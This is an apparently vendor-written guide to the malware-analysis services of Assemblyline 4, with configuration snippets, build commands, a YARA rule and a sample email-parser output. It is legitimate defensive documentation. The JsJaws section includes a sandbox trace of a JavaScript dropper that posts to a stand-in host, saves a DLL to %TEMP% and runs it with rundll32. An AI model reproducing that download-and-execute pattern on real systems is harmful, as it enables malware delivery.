Assemblyline 4 Services: A Guided Tour

Assemblyline 4 Services: A Guided Tour
April 10, 2024

Assemblyline 4 is a popular open-source private malware repository. Arguably the most powerful feature of Assemblyline 4 is the capability to chain many malware analysis services together for comprehensive and highly customisable artifact triage and analysis. 

Each Assemblyline service performs a specific function (similar to the “microservices” pattern often used in software architecture). These services can be chained together to process files, extract relevant information, and evaluate potential threats, including it running many times over to deobfuscate multiple layers of obfuscation. This allows us to get deep insight on binaries, documents, and other file artefacts while keeping the samples local to our AssemblyLine instance and using the best-of-breed analysis tools that help us understand it best. It also allows us to score each file to assess if it’s malicious, suspicious, or benign.

In this guide, we’ll dive into Assemblyline’s most useful managed (built-in) services you can incorporate into your analysis workflows.

Who would use AssemblyLine 4 and why?

Organisations using AssemblyLine 4 often fall into one or more of these categories:

  • They’re dealing with a large amount of unique malware they wish to keep samples of in a segregated environment.
  • They don’t wish to upload samples to public or shared tools like VirusTotal since the samples may be highly sensitive or be attributable.
  • They are dealing with many maldocs, being Word, PDF, or Excel docs designed to exploit the workstation of the person opening it as an attachment. Maldocs can often be highly targeted and reveal the identity of the organisation being targeted as well as PII of individuals in the organisation.

If you’re considering Assemblyline for your organisation, check out our hosted Assemblyline 4 service, MalwareZoo. MalwareZoo gives you access to powerful and private malware analysis and storage capabilities (including all the built-in services featured in this guide) without the operations and infrastructure pain.

Service Categories

Windows Binary Analysis

APIVector Service

Utilise common Windows API calls to construct a representation called an ApiVector, used to analyse and classify Windows binaries.

ApiVector can be especially useful when comparing incoming data to a collection of ApiVectors. These vectors can be sourced from Malpedia, and the service can use them to regularly pull updates for analysis. Users can also generate their own ApiVectors, typically as a CSV file.

ApiVector offers parameters for matching ApiVectors, including minimum confidence and minimum Jaccard score, which determine the level of matching and reporting for detected malware families.

Service configuration options available for the APIVector service:

# Parameters for matching apivector

# minimum confidence in the apivector match to do anything with it

"min_confidence": 50,

# min jaccard score to report as implant family

# from https://journal.cecyf.fr/ojs/index.php/cybin/article/view/2 , you can set this depending on your

# tolerance for false positives.

# Even if set very high, FPs are still possible for samples that share a lot of statically linked code

# * 0.18 leads to a TPR/FPR of 90.18% and 9.45%

# * 0.22 leads to a TPR/FPR of 89.10% and 4.74% (closest distance to the (0,1) point)

# * 0.32 leads to a TPR/FPR of 86.55% and 0.99%

# * 0.55 leads to a TPR/FPR of 80.72% and 0.09%

"min_jaccard": 0.40

CAPA Service

The CAPA Service is essentially a wrapper around the core functionalities of mandiant/capa, offering streamlined access to its capabilities. Mandiant/capa detects capabilities in executable files. For example, it might suggest that a given file is a backdoor, is capable of installing services, or relies on HTTP to communicate.

For submission parameters and configuration, users can specify the renderer, which dictates the output format. Currently, there are three renderers available: "simple," "default," and "verbose," each offering varying levels of information presentation. The "default" renderer mirrors CAPA’s default output, showcasing information in three tables: ATT&CK, MBC, and other capabilities.

ViperMonkey Service

ViperMonkey emulates VBA code execution, allowing analysts to understand how a potentially malicious macro behaves without executing it in a live environment. Its primary purpose is to analyse and deobfuscate malicious VBA macros found in Microsoft Office files such as Word, Excel and PowerPoint documents. The service also tracks intermediate IOCs generated during macro execution, including dropped files and injected shellcode bytes.

Android APK Analysis

APKaye Service

APKaye helps analysts to uncover insights about Android applications. It decompiles and inspects Android APKs, providing information on network indicators and details extracted from the APK manifest file. It combines three tools under the hood to achieve this:

  1. Apktool, which disassembles the APK file for analysis.
  2. Dex2jar, optionally used to convert .dex objects within the APK into JAR files for further analysis with Assemblyline services like Espresso.
  3. Aapt, which analyses the metadata of the APK, including examining the manifest for permissions, determining the SDK target, and components used, as well as extracting and analysing different strings present in the APK.

Deobfuscation

Batchdeobfuscator Service

A Python script to deobfuscate a batch script that is obfuscated with string substitution and escape character techniques.

DeobfuScripter Service

A static script de-obfuscator designed to extract obfuscated Indicators of Compromise (IOCs)

FrankenStrings Service

This service scans for ASCII and Unicode strings that may indicate indicators of compromise (IOCs).

It utilises Balbuzard's bbcrack tool for XOR transformation, searching for specific IOCs. It also extracts Unicode, Hex, and ASCII-Hex strings, particularly useful for potential shellcode. Finally, it tags IOC pattern matches.

Overpower Service

Overpower de-obfuscates and assesses PowerShell files. It employs modified open-source tools for this purpose, including PSDecode (a PowerShell script used to de-obfuscate encoded PowerShell scripts) and PowerShellProfiler, which de-obfuscates and normalises script content, then profiles it to identify behavioural indicators.

Linux Binary Analysis

ELF Service

This service uses the LIEF library to analyse executable Linux files and provides metadata about the file. LIEF is a cross-platform library for parsing, modifying and abstracting ELF, PE and MachO formats. It also provides an API to access and potentially modify internal structures.

ELFPARSER Service

This service wraps the elfparser library and makes the output easily viewable in the Assemblyline UI.

ELF-based malware targets files using the ELF (Executable and Linkable Format) binary format. ELF is a common format used for executables, object code, and shared libraries in Unix-like operating systems, such as Linux. This service provides static analysis and quick access to information about ELF binaries and insight on whether a given binary is suspicious or malicious.

The ELFPARSER CLI provides detailed output, including the score of analysed files, scoring reasons, and detected capabilities. It can identify network functions, process manipulation functions, environment variable manipulation, shell commands, packed files, hard-coded IPv4 addresses, anti-debug techniques, and dropper functionality.

Compiling ELFPARSER:

docker run -u 0 --rm -v $(path_to_extracted_elfparser_source_code):/tmp/elfparser -it cccs/assemblyline-v4-service-base /bin/bash

apt update

apt install -y cmake libboost-all-dev build-essential

mkdir /tmp/elfparser/build

cd /tmp/elfparser/build

cmake ..

make

Email Analysis

EmlParser Service

A wrapper service around GOVCERT-LU/eml_parser used to extract information from .eml files including attachments (hashes and filenames), address fields, received servers path, email subject, and a list of URLs parsed from the email content. The output can easily be converted to JSON.

Example JSON output from EmlParser:

  {

    "body": [

      {

        "content_header": {

          "content-language": [

            "en-US"

          ]

        },

        "hash": "6c9f343bdb040e764843325fc5673b0f43a021bac9064075d285190d6509222d"

      }

    ],

    "header": {

      "received_src": null,

      "from": "john.doe@example.com",

      "to": [

        "test@example.com"

      ],

      "subject": "Sample EML",

      "received_foremail": [

        "test@example.com"

      ],

      "date": "2013-04-26T11:15:47+00:00",

      "header": {

        "content-language": [

          "en-US"

        ],

        "received": [

          "from localhost\tby mta.example.com (Postfix) with ESMTPS id 6388F684168\tfor <test@example.com>; Fri, 26 Apr 2013 13:15:55 +0200"

        ],

        "to": [

          "test@example.com"

        ],

        "subject": [

          "Sample EML"

        ],

        "date": [

          "Fri, 26 Apr 2013 11:15:47 +0000"

        ],

        "message-id": [

          "<F96257F63EAEB94C890EA6CE1437145C013B01FA@example.com>"

        ],

        "from": [

          "John Doe <john.doe@example.com>"

        ]

      },

      "received_domain": [

        "mta.example.com"

      ],

      "received": [

        {

          "with": "esmtps id 6388f684168",

          "for": [

            "test@example.com"

          ],

          "by": [

            "mta.example.com"

          ],

          "date": "2013-04-26T13:15:55+02:00",

          "src": "from localhost by mta.example.com (postfix) with esmtps id 6388f684168 for <test@example.com>; fri, 26 apr 2013 13:15:55 +0200"

        }

      ]

    }

  }

Java Analysis

Espresso Service

This service analyses JAR files by extracting, decompiling and analysing all classes for malicious behaviour using the CFR decompiler tool. Potentially malicious files are included in the results for analyst review.

Network Analysis

Suricata Service

The Suricata Service scans network capture files using signatures and extracts files from the network capture. It uses three rulesets by default:

  1. Emerging Threats Open
  2. Snortv3 Community
  3. URLhaus

Document Analysis (Microsoft Office)

Oletools Service

Analyse Microsoft OLE (Object Linking and Embedding) and XML documents for metadata extraction and network information, while also identifying anomalies. Oletools utilises the Python libraries py-oletools and hachoir to provide a comprehensive assessment of potentially malicious content.

For each analysed file Oletools provides individual macro analysis (including SHA256 hashes and suspicious strings detection), extraction of embedded document streams, identification of malicious Class Identifiers, and detection of suspicious XML/OLE stream features like FrankenStrings IOC Patterns, Adobe Flash content, Base64 and Hex encoded content, and MSO DDE Links.

XLMMacroDeobfuscator Service

Decode obfuscated XLM macros (also known as Excel 4.0 macros). A wrapper service for XLMMacroDeobfuscator which uses an internal XLM emulator to interpret the macros without fully executing the code.

Document Analysis (PDF)

PDFId Service Service

The PDFId service wraps PDFId (Version 2.7) and PDFParser (Version 7.4) to extract metadata and objects from PDF files.

PDFId reports the PDF header string, counts of various elements (objects, streams, etc.) and metadata such as modification date, creation date, etc.

PDFParser reports the number of different PDF elements (Comment, XREF, etc.), extracts PDF elements like comments, trailer, startXref, and extracts suspicious elements flagged by PDFId plugins.

PeePDF Service

A wrapper around the PeePDF library used to report file information, heuristics, and other items of interest about PDFs, including CVE identifiers, embedded files, JavaScript and URL detection. The ultimate goal of PeePDF is to give security researchers all the information and tools they might possibly need when analysing PDF files.

Metadata Analysis

Characterize Service

Characterize is a file information extraction service. It divides the file into partitions and calculates visual entropy for each partition as well as utilising hachoir-metadata and exiftool commands to extract metadata information from the file.

MetaPeek Service

Checks the metadata of a submitted file to look for anomalies with a focus on common techniques that spam writers use to lure victims to click on embedded files. This includes checking for things like double file extensions, empty file names, excessive use of whitespace and bi-directional unicode control characters.

Script Analysis (Javascript)

JsJaws Service

This service combines elements from six different open-source projects to comprehensively analyse and score JavaScript malware using signatures. The core components of the service are:

1. Malware Jail, which provides a sandbox for semi-automatic malware analysis, deobfuscation, and payload extraction.

2. Box.js, a sandbox for studying JavaScript malware.

3. JS-X-Ray for static analysis via SAST scanning.

4. Synchrony to deobfuscate JavaScript obfuscated with obfuscator.io.

5. WScript Emulator emulates/traces Windows Script Host functionality.

6. GootLoaderAutoJsDecode for automatic decoding of Gootloader files using static analysis.

Malware Jail example output:

bash@linux# node jailme.js malware/example.js

11 Jan 00:06:24 - Malware sandbox ver. 0.2

11 Jan 00:06:24 - ------------------------

11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js

11 Jan 00:06:24 - Malware files: malware/example.js

11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json

11 Jan 00:06:24 - Output directory for generated files: output/

11 Jan 00:06:24 - ==> Preparing Sandbox environment.

11 Jan 00:06:24 -  => Executing: env/eval.js

11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls.

11 Jan 00:06:24 -  => Executing: env/wscript.js

11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment.

11 Jan 00:06:24 - ==> Executing malware file(s).

11 Jan 00:06:24 -  => Executing: malware/example.js

11 Jan 00:06:24 - ActiveXObject(WScript.Shell)

11 Jan 00:06:24 - Created: WScript.Shell[1]

11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%)

11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP)

11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2]

11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false)

11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded)

11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601)

11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y

11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data

11 Jan 00:06:24 - ActiveXObject(ADODB.Stream)

11 Jan 00:06:24 - Created: ADODB_Stream[3]

11 Jan 00:06:24 - ADODB_Stream[3].Open()

11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes

11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\57020551.dll, 2)

11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\57020551.dll, DllRegisterServer)

11 Jan 00:06:24 - ADODB_Stream[3].Close()

11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file.

11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll

11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf

11 Jan 00:08:42 - Generated file saved

11 Jan 00:08:42 - Generated file saved

11 Jan 00:08:42 - The sandbox context has been  saved to: sandbox_dump_after.json

IOC Extraction

ConfigExtractor Service

Extract malware configurations, such as IP addresses, URLs, and domains, by using the ConfigExtractor Python library. Works with multiple extraction frameworks, including MWCP, CAPE with MACO output.

Python usage example for the ConfigExtractor Service:

from configextractor.main import ConfigExtractor

import logging

# Create a logger to track ongoings

logger = logging.getLogger()

logger.handlers = [logging.StreamHandler()]

logger.setLevel('DEBUG')

# Instantiate instance of class with path(s) to extractors

# Attaching a logger will allow some insight into what's going on if parser detection is the issue

cx = ConfigExtractor(["/path/to/extractors/"], logger=logger)

# List all parsers actively detected and loaded into instance

# cx.parsers.keys() lists all the relative module paths to the parsers

# The value of each key is an Extractor object containing details for running the extractor (ie. venv location, YARA rule, etc.)

print([cx.get_details(p)['name'] for p in cx.parsers.values()])

# Run all loaded parsers against sample

results = cx.run_parsers('/path/to/sample')

# Output raw results to stdout, each should be organized by the parsers that generated an output

print(results)

Floss Service

Floss uses FireEye Labs Obfuscated String Solver (FLOSS) to identify obfuscated strings, including stacked strings, in executable and Windows files.

It uses several different modules for string extraction, including static strings (in ASCII and UNICODE), decoded strings, and stacked strings. The output also includes strings matching IOC patterns of interest.

Safelist Service

Designate a set of files as safe, preventing them from being scanned by Assemblyline in the future. The safelist can be populated either through predefined safelist sources or by users marking files as safe directly within the Assemblyline UI.

You can set up a safelist using a SQL database (similar to NSRL's format, with FILE and PKG tables) or a CSV file. You can also define trusted distributors using regular expressions to ensure the trustworthiness of your hashes.

Signature Analysis

AntiVirus Service

Integrates with popular AV products like Kaspersky, Skyhigh, ESET, Bitdefender, WithSecure, and Sophos, supporting both ICAP or HTTP requests. Users can integrate with additional antivirus products by providing details like the product name, IP address, port, update period, and optional file size limit. You can also manage false positives by revising the scores in the Assemblyline interface or by identifying and adjusting any signatures causing issues.

Source: CybercentreCanada/assemblyline-service-antivirus. Managing a false positive in the AntiVirus Service.

YARA / TagCheck Service

Two services in one: YARA and TagCheck. The YARA service runs the YARA application against all file types. It currently supports various external modules such as Dotnet, ELF, Hash, Magic, Math, and PE. The YARA rules adhere to the CCCS standard.

TagCheck is a post-processing service that compares all tags generated by other services to a signature set using YARA signatures. It utilises the same code as the YARA service but populates the YARA externals features with all the tags generated by other services.

By default, the TagCheck service runs a small set of signatures mainly geared toward dynamic analysis results analysis (say that three times fast!), with its signature format following the CCCS standard but with added external features to reference Assemblyline tags inside signatures.

Example TagCheck signature format:

rule UPX_Packer_PE_Section {

        meta:

            version = "1.0"

            description = "Identifies UPX packer by PE section names"

            source = "CCCS"

            author = "assemblyline_devs@CCCS"

            status = "RELEASED"

            sharing = "TLP:WHITE"

            category = "TECHNIQUE"

            technique = "packer:UPX"

            mitre_att = "T1045"

        condition:

            al_file_pe_sections_name matches /UPX[0-9]/

    }

VirusTotal Service

Check and optionally submit files/URLs to VirusTotal for analysis (BYO free or paid API key) using the v3 REST API. Because doing so will transfer the file externally to VirusTotal, initiating a request for analysis will prompt the user and warn them that the file and related metadata will leave the Assemblyline system.

Sandboxing

CAPE Service

Submit files to a CAPEv2 deployment and receive parsed reports (users are responsible for setting up the CAPE nest and victim machines). The service retrieves analysis results for the detonation of a submitted file in a victim, displaying a summarised version of the report in the Assemblyline UI. The full report is also available in the Assemblyline UI as a supplementary file. Files that are unpacked and saved to disk are fed back into Assemblyline.

Miscellaneous

Intezer Service

Fetch the Intezer Analyze report for the SHA256 of a submitted file. Optionally, if the SHA256 is not found on the Intezer Analyze instance, the service will submit the file. Created by x1mus with support from Sorakurai and reynas at NVISO, Intezer is now maintained by the Canadian Centre for Cyber Security.

This service calls the Intezer Analyze API with the hash of the file and returns the results. Prior to making the request, the user will be warned that their file or metadata related to their file will leave the Assemblyline system.

PixAxe Service

An image analysis service combining Optical Character Recognition (OCR) via Tesseract and optional steganography modules (recommended for academic use only). The OCR process can be configured to look for specific terms, such as terms commonly related to ransomware.

Example term inclusion and exclusion for the PixAxe service:

config:

    ocr:

        ransomware:

            include: ['bad1', 'bad2', ...]

            exclude: ['bank account']

Swiffer Service

A wrapper around the Python pyswf library to extract metadata and perform anomaly detection on 'audiovisual/flash' files (SWF).

TorrentSlicer Service

Extract metadata, calculated data (torrent type, number of pieces, last piece size, torrent size) and file path, file length and MD5Sum information from torrent files.

URLCreator Service

Create URI files for URIs extracted by other services based on their score or other specified criteria.

URLDownloader Service

Download seemingly malicious URLs using MAS' Kangooroo utility

Unpacker Service

Unpack UPX packed executables for further analysis.

Unpac.me Service

Facilitates the submission of PE32 binaries to the unpac.me API and provides the results. UnpacMe is an automated malware unpacking service. Users of this service will need to bring their own UnpacMe API key (Community or Subscription).

Community Services

Assemblyline is also compatible with a range of community created and maintained services, listed here. However, note that these services are not managed or officially endorsed by the Assemblyline team.

Wrapping Up

If your organisation is exploring Assemblyline and the available services listed here, take a look at our SaaS Assemblyline 4 product, MalwareZoo. MalwareZoo offers robust malware analysis and storage capabilities in a private environment, including all the built-in services outlined in this guide. Getting AssemblyLine up and running for production purposes takes some work - work Cosive has already done for you!

MalwareZoo is fully installed, maintained, upgraded and secured by our team at Cosive, so your team can focus on what they do best: understanding and defending against malware. We’d love to hear about your malware analysis challenges and how we might be able to help.

Hero photo by Simon Kadula on Unsplash.